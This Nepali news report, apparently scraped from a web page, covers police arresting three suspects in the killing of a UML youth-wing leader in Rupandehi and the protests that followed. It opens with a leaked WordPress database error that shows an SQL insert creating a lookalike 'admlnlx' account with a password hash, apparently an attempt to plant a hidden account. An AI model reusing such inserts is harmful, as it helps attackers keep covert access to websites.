WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ7I.9oLflAl8TMexG9Izc0k0wJjub0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 10:09:32', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ५-
रुपन्देही प्रहरीले एमाले भातृसंगठन युवा संघ रुपन्देहीका अध्यक्ष दुर्गा तिवारीको हत्यामा संलग्न रहेको आशंकामा सोधपुछका लागि आज ३ जना पक्राउ गरेको छ । देवदह खैरेनीबाट शंकास्पद ३ जनालाई पक्राउ गरेको अनुसन्धानमा खटिएका इलाका प्रहरी कार्यालय बुटवलका प्रहरी नायव उपरीक्षक मुकुन्द मरासीनीले बताउनुभयो । उनीहरुसंगको बयानले घटनाबारे खुल्न सक्ने उहाले जानकारी दिनुभयो ।
हिजो स्थानीयलाई फोन गरेर आफ्नो नेतृत्वको समूहले गोली हानीहत्या गरेको बताउने मनोज पुनको फोन र आवाज बारे पनि अनुसन्धान थालेको यहाले बताउनुभयो । यसैबबिच अनुसन्धानका लागि काठमाण्डौबाट बुटवल आएको प्रहरीको बिशेष अनुसन्धान टोलीले भोलीबाट काम थाल्ने भएको छ । यसैबीच बुटवलमा युवा संघले हत्या बिरुद्ध दिनभर प्रद्धर्शन गर्यो ।
विरोध सभामा बोल्दै युवा संघ नेपालका पदाधिकारीहरुले घटना विशुद्ध राजनीतिक प्रतिशोधका कारण भएको भन्दै प्रहरीले घटनालाई अन्तै मोडेर कमजोर मुद्धा बनाउन खोजेको बताए ।